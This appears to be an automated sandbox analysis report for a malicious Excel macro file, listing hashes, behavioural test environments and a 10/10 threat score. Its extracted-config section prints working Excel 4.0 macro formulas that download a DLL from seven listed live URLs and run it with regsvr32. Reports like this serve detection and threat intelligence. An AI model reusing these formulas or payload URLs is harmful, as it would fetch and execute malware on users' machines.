General
-
Target
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017
-
Size
73KB
-
Sample
241119-m46xkawapp
-
MD5
ea6d9e9fd72fdadb35082ddb0ea22da7
-
SHA1
60fc0032ed500c2a655469ffb4aa90a35de4b023
-
SHA256
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017
-
SHA512
7c8329202c8211d87e544427ad00ba09be7ff5a6023e3265243c9bc0005bf54ebc66c80c52aab2a21db3c2f570405572cfaf08fbf2da3e3dcbb15a31f4b0ffef
-
SSDEEP
1536:EheXF/Sto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMbV6Jr:EhUItzSmICpH7OZuvZGsMwr
Behavioral task
behavioral1
Sample
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/
http://alexandreinacio.com/erros/7KuhQtHTu/
http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/
https://ambassadedutogo.ch/assets/MFckuq1UcuDcJR5z/
http://alugueldebrinquedos.barueri.br/cgi-bin/9yuuBqDF/
http://www.annuncivallecamonica.it/oc-content/67q/
http://hitmidia.com.br/hitcardmodelos/BZC3LBLANRJKXD6bqI/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alexandreinacio.com/erros/7KuhQtHTu/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ambassadedutogo.ch/assets/MFckuq1UcuDcJR5z/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alugueldebrinquedos.barueri.br/cgi-bin/9yuuBqDF/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.annuncivallecamonica.it/oc-content/67q/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hitmidia.com.br/hitcardmodelos/BZC3LBLANRJKXD6bqI/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()
Extracted
http://onlytesting.uknowva.com/cgi-bin/ykwkwDElL7GqV/
http://alexandreinacio.com/erros/7KuhQtHTu/
http://dalmiavihar.com/Fox-C404/dogTQp57ShXI1SqA/
Targets
-
-
Target
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017
-
Size
73KB
-
MD5
ea6d9e9fd72fdadb35082ddb0ea22da7
-
SHA1
60fc0032ed500c2a655469ffb4aa90a35de4b023
-
SHA256
a1d6c1829b28235c056139f8d03a6101c6fb1f87cd0ec20d1efdc51861559017
-
SHA512
7c8329202c8211d87e544427ad00ba09be7ff5a6023e3265243c9bc0005bf54ebc66c80c52aab2a21db3c2f570405572cfaf08fbf2da3e3dcbb15a31f4b0ffef
-
SSDEEP
1536:EheXF/Sto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMbV6Jr:EhUItzSmICpH7OZuvZGsMwr
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-